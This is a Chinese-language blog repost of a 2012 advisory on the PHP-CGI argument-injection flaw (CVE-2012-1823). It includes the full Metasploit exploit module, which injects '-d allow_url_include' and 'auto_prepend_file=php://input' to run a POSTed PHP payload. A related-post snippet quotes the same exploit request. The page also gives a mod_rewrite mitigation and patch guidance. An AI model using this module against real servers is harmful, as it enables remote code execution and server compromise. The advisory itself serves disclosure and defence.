php cgi 执行,PHP-CGI远程任意代码执行漏洞

最新推荐文章于 2024-08-12 10:11:14 发布
最新推荐文章于 2024-08-12 10:11:14 发布
阅读量590 收藏
点赞数
文章标签: php cgi 执行

PHP-CGI远程任意代码执行漏洞

发布日期:2012-05-03

更新日期:2012-05-04

受影响系统:

PHP PHP

描述:

--------------------------------------------------------------------------------

CVE ID: CVE-2012-1823

PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。可以被各种Web服务器以多种方式调用,实现动态网页的功能。

PHP处理参数的传递时存在漏洞,在特定的配置情况下,远程攻击者可能利用此漏洞在服务器上获取脚本源码或执行任意命令。

当PHP以特定的CGI方式被调用时(例如Apache的mod_cgid),php-cgi接收处理过的查询格式字符串作为命令行参数,允许命令行开关(例如-s、-d 或-c)传递到php-cgi程序,导致源代码泄露和任意代码执行。FastCGI不受影响。

链接:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

http://ompldr.org/vZGxxaQ

http://zone.wooyun.org/content/151

http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

MetaSploit提供了如下测试模块:

##

# $Id$

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

#   http://metasploit.com/

##

load 'lib/msf/core/exploit/http/server.rb'

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name'           => 'PHP CGI Argument Injection',

'Description'    => %q{

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to

an argument injection vulnerability.  This module takes advantage of

the -d flag to set php.ini directives to achieve code execution.

From the advisory: "if there is NO unescaped ‘=’ in the query string,

the string is split on ‘+’ (encoded space) characters, urldecoded,

passed to a function that escapes shell metacharacters (the “encoded in

a system-defined manner” from the RFC) and then passes them to the CGI

binary."

},

'Author'         => [ 'egypt', 'hdm' ],

'License'        => MSF_LICENSE,

'Version'        => '$Revision$',

'References'     => [

[ "CVE"    , "2012-1823" ],

[ "URL"    , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],

],

'Privileged'     => false,

'Payload'        =>

{

'DisableNops' => true,

# Arbitrary big number. The payload gets sent as an HTTP

# response body, so really it's unlimited

'Space'       => 262144, # 256k

},

'DisclosureDate' => 'May 03 2012',

'Platform'       => 'php',

'Arch'           => ARCH_PHP,

'Targets'        => [[ 'Automatic', { }]],

'DefaultTarget' => 0))

register_options([

OptString.new('TARGETURI', [false, "The URI to request"]),

], self.class)

end

# php-cgi -h

# ...

#   -s               Display colour syntax highlighted source.

def check

uri = target_uri.path

if(uri and ! uri.empty?)

uri.gsub!(/\?.*/, "")

print_status("Checking uri #{uri}")

response = send_request_raw({ 'uri' => uri })

if response and response.code == 200 and response.body =~ /\\

print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")

return Exploit::CheckCode::Unknown

end

response = send_request_raw({ 'uri' => uri + '?-s'})

if response and response.code == 200 and response.body =~ /\\

return Exploit::CheckCode::Vulnerable

end

print_error("Server responded indicating it was not vulnerable")

return Exploit::CheckCode::Safe

else

return Exploit::CheckCode::Unknown

end

end

def exploit

#sleep 100

begin

php_trues  = [ "1", "on", "true" ]

php_falses = [ "0", "off", "false" ]

args = [

"-d+allow_url_include%3d#{rand_php_ini_true}",

"-d+auto_prepend_file%3dphp://input",

]

qs = args.join("+")

uri = "#{target_uri}?#{qs}"

p uri

# Has to be all on one line, so gsub out the comments and the newlines

payload_oneline = "<?php " +payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")

response = send_request_cgi( {

'method' => "POST",

'global' => true,

'uri'    => uri,

'data'   => payload_oneline,

}, 0.1)

handler

rescue ::Interrupt

raise $!

rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused

print_error("The target service unreachable")

rescue ::OpenSSL::SSL::SSLError

print_error("The target failed to negotiate SSL, is this really an SSL service?")

end

end

def rand_php_ini_false

[ "0", "off", "false" ].sort_by{rand}.first

end

def rand_php_ini_true

[ "1", "on", "true" ].sort_by{rand}.first

end

end

建议:

--------------------------------------------------------------------------------

临时解决方法:

使用RewriteRule来过滤请求:

RewriteRule规则如下

RewriteEngine on

RewriteCond %{QUERY_STRING} ^[^=]*$

RewriteCond %{QUERY_STRING} %2d|\- [NC]

RewriteRule .? - [F,L]

厂商补丁:

PHP

---

目前厂商已经发布了5.3.12及5.4.2两个最新版本,但有报告说并没有正确修复这个安全问题,请密切关注厂商网站下载最新版本:

http://www.php.net0b1331709591d260c1c78e86d0c51c18.png

ZJIMPROVE
关注
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
千寻的博客
03-06 1258
就是用户请求的`querystring`(`querystring`字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了`php-cgi`的参数,最终导致了一系列结果。
(CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1386
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
php cgi 执行,php cgi远程任意代码执行漏洞
weixin_39520353的博客
03-10 141
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
玄道的网安博客
08-12 889
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 955
PHP-CGI远程代码执行漏洞(CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
PHP-CGI远程代码执行
qq_53701412的博客
04-17 715
PHP SAPL
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
weixin_45653478的博客
06-27 888
CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码
PHP-CGI远程代码执行漏洞分析与防范
10-19
PHP-CGI远程代码执行漏洞(CVE-2012-1823)是一个严重的安全漏洞,它允许远程攻击者通过构造特殊的HTTP请求,执行任意PHP代码。这个漏洞主要影响以CGI模式运行的PHP,而以FastCGI模式运行的PHP-FPM不受影响。之所以...
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2111
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
php cgi源码,PHP-CGI远程任意代码执行漏洞
weixin_36482113的博客
03-09 565
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
PHP-CGI远程代码执行漏洞(CVE-2012-1823&&CVE-2012-2311)
EC_Carrot的博客
07-18 547
漏洞详细 详细务必请看:https://vulhub.org/#/environments/php/CVE-2012-1823/ 影响版本 php < 5.3.12 or php < 5.4.2 漏洞复现 访问http://your-ip:8080/index.php?-s即爆出源码,说明漏洞存在,我们可以发送以下数据包来执行任意命令: POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input H
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1016
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 662
使用kali-msf6对ubuntu的php-CGI漏洞攻击
PHP反序列化漏洞CGI远程代码执行漏洞
LCW991207的博客
08-17 579
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。
【CVE-2024-4577】PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 1987
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码
深入理解CGI、FastCGIPHP-CGIPHP-FPM与Spawn-FCGI的区别与配置优化
本文主要探讨了PHP环境配置中的几种常见运行方式:CGI、FastCGIPHP-CGIPHP-FPM以及Spawn-FCGICGI(Common Gateway Interface)是一种早期的交互式模型,用于在Web服务器和外部程序之间传递请求。CGI程序需要在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值